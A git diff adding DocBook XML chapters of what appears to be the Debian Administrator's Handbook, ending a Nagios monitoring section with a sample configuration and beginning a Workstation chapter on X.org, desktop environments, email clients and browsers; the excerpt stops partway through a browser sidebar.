+	    should be grouped together for display, or to factor some
+	    common configuration elements;</para>
+          </listitem>
+          <listitem>
+	    <para>a <emphasis>service</emphasis> is a testable element
+	    related to a host or a host group. It will most often be a
+	    check for a network service, but it can also involve checking
+	    that some parameters are within an acceptable range (for
+	    instance, free disk space or processor load);</para>
+          </listitem>
+          <listitem>
+	    <para>a <emphasis>servicegroup</emphasis> is a set of services
+	    that should be grouped together for display;</para>
+          </listitem>
+          <listitem>
+	    <para>a <emphasis>contact</emphasis> is a person who can
+	    receive alerts;</para>
+          </listitem>
+          <listitem>
+	    <para>a <emphasis>contactgroup</emphasis> is a set of such
+	    contacts;</para>
+          </listitem>
+          <listitem>
+	    <para>a <emphasis>timeperiod</emphasis> is a range of time
+	    during which some services have to be checked;</para>
+          </listitem>
+          <listitem>
+	    <para>a <emphasis>command</emphasis> is the command line
+	    invoked to check a given service.</para>
+          </listitem>
+        </itemizedlist>
+
+	<para>According to its type, each object has a number of properties
+	that can be customized. A full list would be too long to include,
+	but the most important properties are the relations between the
+	objects.</para>
+
+	<para>A <emphasis>service</emphasis> uses a
+	<emphasis>command</emphasis> to check the state of a feature on a
+	<emphasis>host</emphasis> (or a <emphasis>hostgroup</emphasis>)
+	within a <emphasis>timeperiod</emphasis>. In case of a problem,
+	Nagios sends an alert to all members of the
+	<emphasis>contactgroup</emphasis> linked to the service. Each
+	member is sent the alert according to the channel described in the
+	matching <emphasis>contact</emphasis> object.</para>
+
+	<para>An inheritance system allows easy sharing of a set of
+	properties across many objects without duplicating information.
+	Moreover, the initial configuration includes a number of standard
+	objects; in many cases, defining new hosts, services and contacts
+	is a simple matter of deriving from the provided generic objects.
+	The files in <filename>/etc/nagios3/conf.d/</filename> are a good
+	source of information on how they work.</para>
+
+	<para>The Falcot Corp administrators use the following
+	configuration:</para>
+
+        <example>
+          <title><filename>/etc/nagios3/conf.d/falcot.cfg</filename> file</title>
+
+          <programlisting>define contact{
+    name                            generic-contact
+    service_notification_period     24x7
+    host_notification_period        24x7
+    service_notification_options    w,u,c,r
+    host_notification_options       d,u,r
+    service_notification_commands   notify-service-by-email
+    host_notification_commands      notify-host-by-email
+    register                        0 ; Template only
+}
+define contact{
+    use             generic-contact
+    contact_name    rhertzog
+    alias           Raphael Hertzog
+    email           hertzog@debian.org
+}
+define contact{
+    use             generic-contact
+    contact_name    rmas
+    alias           Roland Mas
+    email           lolando@debian.org
+}
+
+define contactgroup{
+    contactgroup_name     falcot-admins
+    alias                 Falcot Administrators
+    members               rhertzog,rmas
+}
+
+define host{
+    use                   generic-host ; Name of host template to use
+    host_name             www-host
+    alias                 www.falcot.com
+    address               192.168.0.5
+    contact_groups        falcot-admins
+    hostgroups            debian-servers,ssh-servers
+}
+define host{
+    use                   generic-host ; Name of host template to use
+    host_name             ftp-host
+    alias                 ftp.falcot.com
+    address               192.168.0.6
+    contact_groups        falcot-admins
+    hostgroups            debian-servers,ssh-servers
+}
+
+# 'check_ftp' command with custom parameters
+define command{
+    command_name          check_ftp2
+    command_line          /usr/lib/nagios/plugins/check_ftp -H $HOSTADDRESS$ -w 20 -c 30 -t 35
+}
+
+# Generic Falcot service
+define service{
+    name                  falcot-service
+    use                   generic-service
+    contact_groups        falcot-admins
+    register              0
+}
+
+# Services to check on www-host
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   HTTP
+    check_command         check_http
+}
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   HTTPS
+    check_command         check_https
+}
+define service{
+    use                   falcot-service
+    host_name             www-host
+    service_description   SMTP
+    check_command         check_smtp
+}
+
+# Services to check on ftp-host
+define service{
+    use                   falcot-service
+    host_name             ftp-host
+    service_description   FTP
+    check_command         check_ftp2
+}
+</programlisting>
+        </example>
+
+	<para>This configuration file describes two monitored hosts. The
+	first one is the web server, and the checks are made on the HTTP
+	(80) and secure-HTTP (443) ports. Nagios also checks that an SMTP
+	server runs on port 25. The second host is the FTP server, and the
+	check includes making sure that a reply comes within 20 seconds.
+	Beyond this delay, a <emphasis>warning</emphasis> is emitted;
+	beyond 30 seconds, the alert is deemed critical. The Nagios web
+	interface also shows that the SSH service is monitored: this comes
+	from the hosts belonging to the <literal>ssh-servers</literal>
+	hostgroup. The matching standard service is defined in
+	<filename>/etc/nagios3/conf.d/services_nagios2.cfg</filename>.</para>
+
+	<para>Note the use of inheritance: an object is made to inherit
+	from another object with the “use
+	<replaceable>parent-name</replaceable>”. The parent object must
+	be identifiable, which requires giving it a “name
+	<replaceable>identifier</replaceable>” property. If the parent
+	object is not meant to be a real object, but only to serve as a
+	parent, giving it a “register 0” property tells Nagios not to
+	consider it, and therefore to ignore the lack of some parameters
+	that would otherwise be required.</para>
+
+        <sidebar>
+          <title><emphasis>DOCUMENTATION</emphasis> List of object properties</title>
+
+	  <para>A more in-depth understanding of the various ways in which
+	  Nagios can be configured can be obtained from the documentation
+	  provided by the <emphasis role="pkg">nagios3-doc</emphasis>
+	  package. This documentation is directly accessible from the web
+	  interface, with the “Documentation” link in the top left
+	  corner. It includes a list of all object types, with all the
+	  properties they can have. It also explains how to create new
+	  plugins.</para>
+        </sidebar>
+
+        <sidebar>
+          <title><emphasis>GOING FURTHER</emphasis> Remote tests with NRPE</title>
+
+	  <para>Many Nagios plugins allow checking some parameters local to
+	  a host; if many machines need these checks while a central
+	  installation gathers them, the NRPE (<emphasis>Nagios Remote
+	  Plugin Executor</emphasis>) plugin needs to be deployed. The
+	  <emphasis role="pkg">nagios-nrpe-plugin</emphasis> package needs
+	  to be installed on the Nagios server, and <emphasis role="pkg">nagios-nrpe-server</emphasis> on the hosts where local
+	  tests need to run. The latter gets its configuration from
+	  <filename>/etc/nagios/nrpe.cfg</filename>. This file should list
+	  the tests that can be started remotely, and the IP addresses of
+	  the machines allowed to trigger them. On the Nagios side,
+	  enabling these remote tests is a simple matter of adding matching
+	  services using the new <emphasis>check_nrpe</emphasis>
+	  command.</para>
+        </sidebar>
+      </section>
+    </section>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/13_workstation.xml b/tmp/cs-CZ/xml_tmp/13_workstation.xml
new file mode 100644
index 000000000..fbb060a82
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/13_workstation.xml
@@ -0,0 +1,1131 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="workstation">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-workstation.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Workstation</keyword>
+      <keyword>Graphical desktop</keyword>
+      <keyword>Office work</keyword>
+      <keyword>X.org</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Workstation</title>
+  <highlights>
+    <para>Now that server deployments are done, the administrators can
+    focus on installing the individual workstations and creating a typical
+    configuration.</para>
+  </highlights>
+  <section id="sect.x11-server-configuration">
+    <title>Configuring the X11 Server</title>
+    <indexterm><primary>XFree86</primary></indexterm>
+    <indexterm><primary>X.org</primary></indexterm>
+    <indexterm><primary>X11</primary></indexterm>
+    <indexterm><primary>interface</primary><secondary>graphical</secondary></indexterm>
+
+    <para>The initial configuration for the graphical interface can be
+    awkward at times; very recent video cards often don't work perfectly
+    with the X.org version shipped in the Debian stable version.</para>
+
+    <para>A brief reminder: X.org is the software component that allows
+    graphical applications to display windows on screen. It includes a
+    driver that makes efficient use of the video card. The features offered
+    to the graphical applications are exported through a standard
+    interface, <emphasis>X11</emphasis> (<emphasis role="distribution">Stretch</emphasis> contains version
+    <emphasis>X11R7.7</emphasis>).</para>
+
+    <sidebar>
+      <title><emphasis>PERSPECTIVE</emphasis> X11, XFree86 and X.org</title>
+
+      <para>X11 is the graphical system most widely used on Unix-like
+      systems (also available for
+      Windows and Mac OS). Strictly speaking, the term “X11” only
+      refers to a protocol specification, but it is also used to refer to
+      the implementation in practice.</para>
+
+      <para>X11 had a rough start, but the 1990s saw XFree86 emerge as the
+      reference implementation because it was free software, portable, and
+      maintained by a collaborative community. However, the rate of
+      evolution slowed down near the end when the software only gained new
+      drivers. That situation, along with a very controversial license
+      change, led to the X.org fork in 2004. This is now the reference
+      implementation, and Debian <emphasis role="distribution">Stretch</emphasis> uses X.org version 7.7.</para>
+    </sidebar>
+
+    <para>Current versions of X.org are able to autodetect the available
+    hardware: this applies to the video card and the monitor, as well as
+    keyboards and mice; in fact, it is so convenient that the package no
+    longer even creates a <filename>/etc/X11/xorg.conf</filename>
+    configuration file.</para>
+    <indexterm><primary>resolution</primary></indexterm>
+
+    <para>The keyboard configuration is currently set up in
+    <filename>/etc/default/keyboard</filename>. This file is used both to
+    configure the text console and the graphical interface, and it is
+    handled by the <emphasis role="pkg">keyboard-configuration</emphasis>
+    package. Details on configuring the keyboard layout are available in
+    <xref linkend="sect.keyboard-config" />.</para>
+
+    <para>The <emphasis role="pkg">xserver-xorg-core</emphasis> package provides
+    a generic X server, as used by the 7.x versions of X.org. This server
+    is modular and uses a set of independent drivers to handle the many
+    different kinds of video cards. Installing <emphasis role="pkg">xserver-xorg</emphasis> ensures that both the server and
+    at least one video driver are installed.</para>
+    <indexterm><primary>server</primary><secondary>X</secondary></indexterm>
+    <indexterm><primary><emphasis role="pkg">xserver-xorg</emphasis></primary></indexterm>
+
+    <para>Note that if the detected video card is not handled by any
+    of the available drivers, X.org tries using the VESA and fbdev
+    drivers. VESA is a generic driver that should work
+    everywhere, but with limited capabilities (fewer available
+    resolutions, no hardware acceleration for games and visual effects
+    for the desktop, and so on) while fbdev works on top of the
+    kernel's framebuffer device. Nowadays the X server runs without
+    any administrative privileges (this used to be required to be able
+    to configure the screen) and thus its log file is now stored
+    in the user's home directory in <filename>~/.local/share/xorg/Xorg.0.log</filename>
+    (whereas it used to be in <filename>/var/log/Xorg.0.log</filename>
+    for versions older than <emphasis role="distribution">Stretch</emphasis>).
+    That log file is where one would look to know what driver is currently
+    in use. For example, the following snippet matches what the
+    <literal>intel</literal> driver outputs when it is loaded:</para>
+
+    <programlisting>
+(==) Matched intel as autoconfigured driver 0
+(==) Matched modesetting as autoconfigured driver 1
+(==) Matched vesa as autoconfigured driver 2
+(==) Matched fbdev as autoconfigured driver 3
+(==) Assigned the driver to the xf86ConfigLayout
+(II) LoadModule: "intel"
+(II) Loading /usr/lib/xorg/modules/drivers/intel_drv.so
+</programlisting>
+    <indexterm><primary>VESA</primary></indexterm>
+    <indexterm><primary>video card</primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>EXTRA</emphasis> Proprietary drivers</title>
+
+      <para>Some video card makers (most notably nVidia) refuse to publish
+      the hardware specifications that would be required to implement good
+      free drivers. They do, however, provide proprietary drivers that
+      allow using their hardware. This policy is nefarious, because even
+      when the provided driver exists, it is usually not as polished as it
+      should be; more importantly, it does not necessarily follow the X.org
+      updates, which may prevent the latest available driver from loading
+      correctly (or at all). We cannot condone this behavior, and we
+      recommend you avoid these makers and favor more cooperative
+      manufacturers.</para>
+
+      <para>If you still end up with such a card, you will find the
+      required packages in the <emphasis>non-free</emphasis> section:
+      <emphasis role="pkg">nvidia-driver</emphasis> for nVidia cards.
+      It requires a matching kernel module. Building the module can be
+      automated by installing the package <emphasis role="pkg">nvidia-kernel-dkms</emphasis> (for nVidia).</para>
+
+      <para>The “nouveau” project aims to develop a free software
+        driver for nVidia cards and is the default driver that you get
+        for nVidia cards in Debian. As of <emphasis role="distribution">Stretch</emphasis>, its feature set and performance do not
+      match the proprietary driver. In the developers' defense, we should
+      mention that the required information can only be gathered by reverse
+      engineering, which makes things difficult. The free driver for ATI
+      video cards, called “radeon”, is much better in that
+      regard although it often requires non-free firmware.</para>
+      <indexterm><primary>ATI</primary></indexterm>
+      <indexterm><primary>nVidia</primary></indexterm>
+    </sidebar>
+  </section>
+  <section id="sect.customizing-graphical-interface">
+    <title>Customizing the Graphical Interface</title>
+    <section>
+      <title>Choosing a Display Manager</title>
+      <indexterm><primary>manager</primary><secondary>display</secondary></indexterm>
+      <indexterm><primary><command>gdm</command></primary></indexterm>
+      <indexterm><primary><command>sddm</command></primary></indexterm>
+      <indexterm><primary><command>xdm</command></primary></indexterm>
+
+      <para>The graphical interface only provides display
+      space. Running the X server by itself only leads to an empty
+      screen, which is why most installations use a <emphasis>display
+      manager</emphasis> to display a user authentication screen and
+      start the graphical desktop once the user has authenticated. The
+      three most popular display managers in current use are <emphasis role="pkg">gdm3</emphasis> (<foreignphrase>GNOME Display
+      Manager</foreignphrase>), <emphasis role="pkg">sddm</emphasis>
+      (suggested for KDE Plasma) and
+      <emphasis role="pkg">lightdm</emphasis> (<foreignphrase>Light Display
+      Manager</foreignphrase>). Since the Falcot Corp administrators
+      have opted to use the GNOME desktop environment, they logically
+      picked <command>gdm3</command> as a display manager too. The
+      <filename>/etc/gdm3/daemon.conf</filename> configuration file
+      has many options (the list can be found in the
+      <filename>/usr/share/gdm/gdm.schemas</filename> schema file)
+      to control its behaviour while
+      <filename>/etc/gdm3/greeter.dconf-defaults</filename> contains
+      settings for the greeter “session” (more than just a login
+      window, it is a limited desktop with power management and
+      accessibility related tools). Note that some of the most
+      useful settings for end-users can be tweaked with GNOME's
+      control center.</para>
+
+    </section>
+    <section>
+      <title>Choosing a Window Manager</title>
+
+      <para>Since each graphical desktop provides its own window
+      manager, which window manager you choose is usually influenced by
+      which desktop you have selected.  GNOME uses the
+      <command>mutter</command> window
+      manager, Plasma uses <command>kwin</command>, and Xfce (which
+      we present later) has <command>xfwm</command>. The Unix
+      philosophy always allows using one's window manager of choice,
+      but following the recommendations allows an administrator to
+      best take advantage of the integration efforts led by each
+      project.</para>
+      <indexterm><primary><command>mutter</command></primary></indexterm>
+      <indexterm><primary><command>kwin</command></primary></indexterm>
+      <indexterm><primary><command>xfwm</command></primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> Window manager</title>
+        <indexterm><primary>manager</primary><secondary>window</secondary></indexterm>
+        <indexterm><primary><emphasis>window manager</emphasis></primary></indexterm>
+
+	<para>The window manager displays the “decorations” around
+	the windows belonging to the currently running applications, which
+	includes frames and the title bar. It also allows reducing,
+	restoring, maximizing, and hiding windows. Most window managers
+	also provide a menu that pops up when the desktop is clicked in a
+	specific way. This menu provides the means to close the window
+	manager session, start new applications, and in some cases,
+	change to another window manager (if installed).</para>
+      </sidebar>
+
+      <para>Older computers may, however, have a hard time running
+      heavyweight graphical desktop environments. In these cases, a lighter
+      configuration should be used. “Light” (or small footprint) window
+      managers include WindowMaker (in the <emphasis role="pkg">wmaker</emphasis> package), Afterstep, fvwm, icewm,
+      blackbox, fluxbox, or openbox. In these cases, the system should be configured so that the
+      appropriate window manager gets precedence; the standard way is to
+      change the <command>x-window-manager</command> alternative with the
+      command <command>update-alternatives --config x-window-manager</command>.</para>
+      <indexterm><primary>WindowMaker</primary></indexterm>
+      <indexterm><primary>Afterstep</primary></indexterm>
+      <indexterm><primary>Blackbox</primary></indexterm>
+      <indexterm><primary>Icewm</primary></indexterm>
+      <indexterm><primary>Fluxbox</primary></indexterm>
+      <indexterm><primary>Openbox</primary></indexterm>
+      <indexterm><primary><command>x-window-manager</command></primary></indexterm>
+
+      <sidebar id="sidebar.alternatives">
+        <title><emphasis>DEBIAN SPECIFICITY</emphasis> Alternatives</title>
+        <indexterm><primary><emphasis>alternative</emphasis></primary></indexterm>
+        <indexterm><primary>choice</primary></indexterm>
+        <indexterm><primary><command>update-alternatives</command></primary></indexterm>
+
+	<para>The Debian policy lists a number of standardized commands
+	able to perform a particular action. For example, the
+	<command>x-window-manager</command> command invokes a window
+	manager. But Debian does not assign this command to a fixed window
+	manager. The administrator can choose which manager it should
+	invoke.</para>
+
+	<para>For each window manager, the relevant package therefore
+	registers the appropriate command as a possible choice for
+	<command>x-window-manager</command> along with an associated
+	priority. Barring explicit configuration by the administrator, this
+	priority allows picking the best installed window manager when the
+	generic command is run.</para>
+
+	<para>Both the registration of commands and the explicit
+	configuration involve the <command>update-alternatives</command>
+	script. Choosing where a symbolic command points at is a simple
+	matter of running <command>update-alternatives --config
+	<replaceable>symbolic-command</replaceable></command>. The
+	<command>update-alternatives</command> script creates (and
+	maintains) symbolic links in the
+	<filename>/etc/alternatives/</filename> directory, which in turn
+	references the location of the executable. As time passes, packages
+	are installed or removed, and/or the administrator makes explicit
+	changes to the configuration. When a package providing an
+	alternative is removed, the alternative automatically goes to the
+	next best choice among the remaining possible commands.</para>
+
+	<para>Not all symbolic commands are explicitly listed by the Debian
+	policy; some Debian package maintainers deliberately chose to use
+	this mechanism in less straightforward cases where it still brings
+	interesting flexibility (examples include
+	<command>x-www-browser</command>, <command>www-browser</command>,
+	<command>cc</command>, <command>c++</command>,
+	<command>awk</command>, and so on).</para>
+        <indexterm><primary><command>x-www-browser</command></primary></indexterm>
+        <indexterm><primary><command>www-browser</command></primary></indexterm>
+        <indexterm><primary><command>cc</command></primary></indexterm>
+        <indexterm><primary><command>c++</command></primary></indexterm>
+        <indexterm><primary><command>awk</command></primary></indexterm>
+      </sidebar>
+    </section>
+    <section>
+      <title>Menu Management</title>
+      <indexterm><primary><command>menu</command></primary></indexterm>
+      <indexterm><primary><command>update-menus</command></primary></indexterm>
+
+      <para>Modern desktop environments and many window managers provide
+      menus listing the available applications for the user. In order to
+      keep menus up-to-date in relation to the actual set of available
+      applications, each package usually provides a <filename>.desktop</filename>
+      file in <filename>/usr/share/applications</filename>. The format
+      of those files has been standardized by FreeDesktop.org:
+      <ulink type="block" url="https://standards.freedesktop.org/desktop-entry-spec/latest/" />
+      </para>
+
+      <para>
+        The applications menus can be further customized by administrators through
+        system-wide configuration files as described by the “Desktop Menu Specification”.
+        End-users can also customize the menus with graphical tools such
+        as <emphasis role="pkg">kmenuedit</emphasis> (in Plasma),
+        <emphasis role="pkg">alacarte</emphasis> (in GNOME) or
+        <emphasis role="pkg">menulibre</emphasis>.
+        <ulink type="block" url="https://standards.freedesktop.org/menu-spec/latest/" />
+      </para>
+
+
+      <sidebar>
+        <title><emphasis>HISTORY</emphasis> The Debian menu system</title>
+        <para>
+          Historically — way before the FreeDesktop.org standards emerged — Debian
+          had invented its own menu system where each package provided a generic
+          description of the desired menu entries in
+          <filename>/usr/share/menu/</filename>. This tool is still available
+          in Debian (in the <emphasis role="pkg">menu</emphasis> package)
+          but it is only marginally useful since package maintainers are
+          encouraged to rely on <filename>.desktop</filename> files
+          instead.
+        </para>
+      </sidebar>
+
+    </section>
+  </section>
+  <section id="sect.graphical-desktops">
+    <title>Graphical Desktops</title>
+
+    <para>The free graphical desktop field is dominated by two large
+    software collections: GNOME and Plasma by KDE. Both of them are very popular.
+    This is rather a rare instance in the free software world; the Apache
+    web server, for instance, has very few peers.</para>
+    <indexterm><primary>graphical desktop</primary></indexterm>
+    <indexterm><primary>GNOME</primary></indexterm>
+    <indexterm><primary>KDE</primary></indexterm>
+    <indexterm><primary>GTK+</primary></indexterm>
+    <indexterm><primary>Qt</primary></indexterm>
+
+    <para>This diversity is rooted in history. Plasma (initially only KDE,
+    which is now the name of the community) was the first graphical desktop
+    project, but it chose the Qt graphical toolkit and that choice
+    wasn't acceptable for a large number of developers. Qt was not free
+    software at the time, and GNOME was started based on the GTK+ toolkit.
+    Qt has since become free software, but the projects still evolved in
+    parallel.</para>
+
+    <para>The GNOME and KDE communities still work together: under the FreeDesktop.org
+    umbrella, the projects collaborated in defining standards for
+    interoperability across applications.</para>
+    <indexterm><primary>FreeDesktop.org</primary></indexterm>
+
+    <para>Choosing “the best” graphical desktop is a sensitive topic
+    which we prefer to steer clear of. We will merely describe the many
+    possibilities and give a few pointers for further thoughts. The best
+    choice will be the one you make after some experimentation.</para>
+
+    <section id="sect.gnome-desktop">
+      <title>GNOME</title>
+
+      <para>Debian <emphasis role="distribution">Stretch</emphasis>
+      includes GNOME version 3.22, which can be installed by a simple
+      <command>apt install gnome</command> (it can also be installed by
+      selecting the “Debian desktop environment” task).</para>
+      <indexterm><primary><emphasis role="pkg">gnome</emphasis></primary></indexterm>
+
+      <para>GNOME is noteworthy for its efforts in usability and
+      accessibility. Design professionals have been involved in writing
+      its standards and recommendations, which has helped developers to create
+      satisfying graphical user interfaces. The project also gets
+      encouragement from the big players of computing, such as Intel, IBM,
+      Oracle, Novell, and of course, various Linux distributions. Finally,
+      many programming languages can be used in developing applications
+      interfacing to GNOME.</para>
+
+      <figure>
+        <title>The GNOME desktop</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/gnome.png" scalefit="1" width="70%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>For administrators, GNOME seems to be better prepared for
+      massive deployments. Application configuration is handled through
+      the GSettings interface and stores its data in the DConf database.
+      The configuration settings can thus be queried and edited with the
+      <command>gsettings</command>, and <command>dconf</command>
+      command-line tools, or by the <command>dconf-editor</command>
+      graphical user interfaces. The administrator can therefore change
+      users' configuration with a simple script. The GNOME website
+      provides information to guide administrators who
+      manage GNOME workstations:
+      <ulink type="block" url="https://help.gnome.org/admin/" />
+      </para>
+      <indexterm><primary><command>gsettings</command></primary></indexterm>
+      <indexterm><primary><command>dconf</command></primary></indexterm>
+    </section>
+    <section>
+      <title>KDE and Plasma</title>
+
+      <para>Debian <emphasis role="distribution">Stretch</emphasis>
+      includes version 5.8 of KDE Plasma, which can be installed with
+      <command>apt install kde-standard</command>.</para>
+
+      <para>Plasma has had a rapid evolution based on a very hands-on
+      approach. Its authors quickly got very good results, which allowed
+      them to grow a large user-base. These factors contributed to the
+      overall project quality. Plasma is a mature desktop
+      environment with a wide range of applications.</para>
+
+      <figure>
+        <title>The Plasma desktop</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/kde.png" scalefit="1" width="70%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>Since the Qt 4.0 release, the last remaining license problem
+      with KDE software has been solved. This version was released under the GPL both
+      for Linux and Windows (the Windows version was previously
+      released under a non-free license). KDE applications are primarily
+      developed using the C++ language.</para>
+    </section>
+    <section>
+      <title>Xfce and Others</title>
+
+      <para>Xfce is a simple and lightweight graphical desktop, which is a
+      perfect match for computers with limited resources. It can be
+      installed with <command>apt install xfce4</command>. Like GNOME,
+      Xfce is based on the GTK+ toolkit, and several components are common
+      across both desktops.</para>
+      <indexterm><primary>Xfce</primary></indexterm>
+
+      <para>Unlike GNOME and Plasma, Xfce does not aim to become a vast
+      project. Beyond the basic components of a modern desktop (file
+      manager, window manager, session manager, a panel for application
+      launchers and so on), it only provides a few specific applications: 
+      a terminal, a calendar (Orage), an image viewer, a CD/DVD burning tool,
+      a media player (Parole), sound volume control and a text editor (mousepad).
+      </para>
+
+      <figure>
+        <title>The Xfce desktop</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/xfce.png" scalefit="1" width="70%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>Another desktop environment provided in
+      <emphasis role="distribution">Stretch</emphasis> is LXDE,
+      which focuses on the “lightweight” aspect. It can be installed
+      with the <emphasis role="pkg">lxde</emphasis>
+      meta-package.</para>
+      <indexterm><primary>LXDE</primary></indexterm>
+    </section>
+  </section>
+  <section id="sect.main-desktop-tools">
+    <title>Email</title>
+    <indexterm><primary>email</primary><secondary>software</secondary></indexterm>
+    <section>
+      <title>Evolution</title>
+      <indexterm><primary>Evolution</primary></indexterm>
+
+      <sidebar>
+	<title><emphasis>COMMUNITY</emphasis> <emphasis>Popular</emphasis> packages</title>
+
+	<para>Installing the <emphasis role="pkg">popularity-contest</emphasis> package enables
+	participation in an automated survey that informs the Debian
+	project about the most popular packages. A script is run weekly
+	by <command>cron</command> which sends (by HTTP or email) an
+	anonymized list of the installed packages and the latest access
+	date for the files they contain. This allows the Debian maintainers to
+	know which packages are most frequently installed, and of these, how
+	frequently they are actually used.  </para>
+	<indexterm><primary><emphasis role="pkg">popularity-contest</emphasis></primary></indexterm>
+	<indexterm><primary>popularity of packages</primary></indexterm>
+	<indexterm><primary>package</primary><secondary>popularity</secondary></indexterm>
+
+	<para>This information is a great help to the Debian project. It
+	is used to determine which packages should go on the first
+	installation disks. The installation data is also an important
+	factor used to decide whether to remove a package with very few
+	users from the distribution. We heartily recommend installing the
+	<emphasis role="pkg">popularity-contest</emphasis> package, and
+	participating in the survey.</para>
+
+        <para>The collected data are made public every day.
+        <ulink type="block" url="https://popcon.debian.org/" /></para>
+
+	<para>These statistics can also help users to choose between two
+	packages that seem otherwise equivalent. Choosing the more popular
+	package is probably a safer choice.</para>
+      </sidebar>
+
+      <para>Evolution is the GNOME email client and can be installed with
+      <command>apt install evolution</command>. Evolution is more than
+      a simple email client: it also provides a calendar, an address
+      book, a task list, and a memo (free-form note) application. Its
+      email component includes a powerful message indexing system, and
+      allows for the creation of virtual folders based on search queries
+      on all archived messages. In other words, all messages are stored
+      the same way but displayed in a folder-based organization, each
+      folder containing messages that match a set of filtering
+      criteria.</para>
+
+      <figure>
+	<title>The Evolution email software</title>
+	<mediaobject>
+	  <imageobject>
+	    <imagedata fileref="images/evolution.png" scalefit="1" width="70%" />
+	  </imageobject>
+	</mediaobject>
+      </figure>
+
+      <para>An extension to Evolution allows integration with a Microsoft
+      Exchange email system; the required package is
+      <emphasis role="pkg">evolution-ews</emphasis>.</para>
+      <indexterm><primary><emphasis role="pkg">evolution-ews</emphasis></primary></indexterm>
+    </section>
+    <section>
+      <title>KMail</title>
+      <indexterm><primary>KMail</primary></indexterm>
+
+      <para>The KDE email software can be installed with <command>apt
+      install kmail</command>. KMail only handles email, but it belongs
+      to a software suite called KDE-PIM (for <emphasis>Personal
+      Information Manager</emphasis>) that includes features such as
+      address books, a calendar component, and so on. KMail has all the
+      features one would expect from an excellent email client.</para>
+
+      <figure>
+	<title>The KMail email software</title>
+	<mediaobject>
+	  <imageobject>
+	    <imagedata fileref="images/kmail.png" scalefit="1" width="70%" />
+	  </imageobject>
+	</mediaobject>
+      </figure>
+    </section>
+    <section>
+      <title>Thunderbird and Icedove</title>
+
+      <para>The <emphasis role="pkg">thunderbird</emphasis> package provides
+      the email client from the Mozilla software
+      suite. Until <emphasis role="distribution">Jessie</emphasis> Debian
+      contained Icedove and not Thunderbird for legal reasons detailed in
+      the sidebar <xref linkend="sidebar.firefox-iceweasel" />.  You may find
+      references to Icedove as the switch has been done recently.</para>
+
+      <para>
+      Various localization sets are available in
+      <emphasis role="pkg">thunderbird-l10n-*</emphasis> packages; the
+      <emphasis role="pkg">enigmail</emphasis> extension handles message
+      encrypting and signing, but it is not available in all languages.</para>
+
+      <figure>
+	<title>The Thunderbird email software</title>
+	<mediaobject>
+	  <imageobject>
+	    <imagedata fileref="images/thunderbird.png" scalefit="1" width="70%" />
+	  </imageobject>
+	</mediaobject>
+      </figure>
+      <indexterm><primary>Thunderbird, Mozilla</primary></indexterm>
+      <indexterm><primary>Mozilla</primary><secondary>Thunderbird</secondary></indexterm>
+
+    </section>
+  </section>
+  <section id="sect.web-browsers">
+    <title>Web Browsers</title>
+    <indexterm><primary>Web browser</primary></indexterm>
+    <indexterm><primary>browser, Web</primary></indexterm>
+
+    <para>Epiphany, the web browser in the GNOME suite, uses the WebKit
+    display engine developed by Apple for its Safari browser. The
+    relevant package is <emphasis role="pkg">epiphany-browser</emphasis>.</para>
+    <indexterm><primary>WebKit</primary></indexterm>
+    <indexterm><primary>Epiphany</primary></indexterm>
+
+    <para>
+      Konqueror, available in the <emphasis role="pkg">konqueror</emphasis> package, is KDE's web browser (but
+      can also assume the role of a file manager). It uses the
+      KDE-specific KHTML rendering engine; KHTML is an excellent engine,
+      as witnessed by the fact that Apple's WebKit is based on KHTML.
+      <indexterm><primary>Konqueror</primary></indexterm>
+    </para>
+
+    <para>Users not satisfied by either of the above can use Firefox.
+    This browser, available in the <emphasis role="pkg">firefox-esr</emphasis> package, uses the Mozilla project's
+    Gecko renderer, with a thin and extensible interface on top.
+    <indexterm><primary>Gecko</primary></indexterm>
+    <indexterm><primary>Mozilla</primary><secondary>Firefox</secondary></indexterm>
+    <indexterm><primary>Firefox, Mozilla</primary></indexterm></para>
+
+    <figure>
+      <title>The Firefox web browser</title>
+      <mediaobject>
+	<imageobject>
+	  <imagedata fileref="images/firefox.png" scalefit="1" width="70%" />
+	</imageobject>
+      </mediaobject>
+    </figure>
+
+    <sidebar>
+      <title><emphasis>VOCABULARY</emphasis> Firefox ESR</title>
+      <indexterm><primary><emphasis role="pkg">firefox-esr</emphasis></primary></indexterm>
+      <para>
+        Mozilla has a very fast-paced release cycle for Firefox. New
+        releases are published every six to eight weeks and only the
+        latest version is supported for security issues. This doesn't
+        suit all kind of users so, every 10 cycles, they are promoting
+        one of their release to an <emphasis>Extended Support Release</emphasis>
+        (ESR) which will get security updates (and no functional changes)
+        during the next 10 cycles (which covers a bit more than a year).
+      </para>
+      <para>
+        Debian has both versions packaged. The ESR one, in the package
+        <emphasis role="pkg">firefox-esr</emphasis>, is used by default
+        since it is the only version suitable for Debian <emphasis role="distribution">Stable</emphasis> with its long support
+        period (and even there Debian has to upgrade from
+        one ESR release to the next multiple times during a Debian Stable
+        lifecycle). The regular Firefox is available in the
+        <emphasis role="pkg">firefox</emphasis> package but it is only
+        available to users of Debian
+        <emphasis role="distribution">Unstable</emphasis>.
+      </para>
+    </sidebar>
+
+    <sidebar id="sidebar.firefox-iceweasel">
+      <title><emphasis>CULTURE</emphasis> Iceweasel, Firefox and others</title>
+      <indexterm><primary>Iceweasel</primary></indexterm>
+      <indexterm><primary>Icedove</primary></indexterm>
+
+      <para>Before Debian <emphasis role="distribution">Stretch</emphasis>,
